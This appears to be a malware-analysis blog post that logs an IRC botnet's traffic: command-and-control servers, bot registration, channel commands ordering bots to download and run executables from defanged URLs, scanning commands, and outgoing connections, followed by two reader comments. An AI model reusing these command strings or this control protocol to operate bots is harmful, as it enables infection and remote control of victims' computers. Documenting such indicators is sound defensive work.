forum.07a.su (IRC botnet hosted in Russian Federation, Moscow, OAO Webalta)

Remote Host         Port Number

83.137.194.30       80

92.241.168.221      6789 (ircd here)

92.241.169.165      6789 (ircd here)

Resolved : [forum.07a.su] To [92.241.168.221]

Resolved : [forum.07a.su] To [92.241.169.165]

NICK [N00_USA_XP_0727651]x

MODE ##im -ix

USER SP2-465 * 0 :COMPUTERNAME

MODE [N00_USA_XP_0727651]x
A -ix
JOIN ##im
PRIVMSG #xxs :HTTP SET hxxp://whiteforum1.com/fud.exe

NICK [N00_USA_XP_3168281]x
PRIVMSG #xxs :HTTP SET hxxp://bisp.gov.pk/203.exe
PRIVMSG [N00_USA_XP_3168
@ :download; File download: 16.0KB to: C:MailServsice.exe @ 16.0KB/sec.
@ :download; Created process: “C:MailServsice.exe”, PID:
MODE ##im -ix
USER SP2-803 * 0 :COMPUTERNAME
MODE [N00_USA_XP_3168281]x
A -ix
JOIN ##im

forum.07a.su            92.241.168.221
svanka.nl               83.137.194.30
www.sevy.eu.org         199.27.134.39
www.google.com          74.125.39.104
www.google.de           74.125.39.103
www.proxysecurity.com   74.52.152.82
Download URLs
http://83.137.194.30/azenv.php (svanka.nl)
http://199.27.134.39/azenv.php (www.sevy.eu.org)
http://74.125.39.104/ (www.google.com)
http://74.125.39.103/ (www.google.de)
http://74.52.152.82/azenv.php (www.proxysecurity.com)

C&C Server: 92.241.168.221:6789
Server Password:
Username: SP3-750
Nickname: [N00_DEU_XP_0334340]x
Channel: ##im (Password: )
Channeltopic: :.a -S -s|.world1 -S|.world1 hxxp://perfectkaiser.com/cs.exe C:MailService.exe 1|.h hxxp://whiteforum1.com/f.exe|.a s 25 0 0 -b -s|.a s 25 0 0 -b -r -e -s|.a s 25 0 0 -a -r -e -s
Outgoing connection to remote server: svanka.nl TCP port 80
Outgoing connection to remote server: svanka.nl TCP port 80
Outgoing connection to remote server: www.sevy.eu.org TCP port 80
Outgoing connection to remote server: www.google.com TCP port 80
Outgoing connection to remote server: www.google.de TCP port 80
Outgoing connection to remote server: www.proxysecurity.com TCP port 80

LINKS:

hxxp://perfectkaiser.com/cs.exe

hxxp://svanka.nl/azenv.php

hosting info:

http://whois.domaintools.com/92.241.168.221

2 Comments

Anonymous - January 25, 2013 at 8:36 pm

perfectKaiser.com/cs.exe is not there; it's clean and nothing is found there. Please explain why it is mentioned here.

Pig - January 25, 2013 at 10:45 pm

Are you dumb or what? Saturday, October 22, 2011 is the date of this post.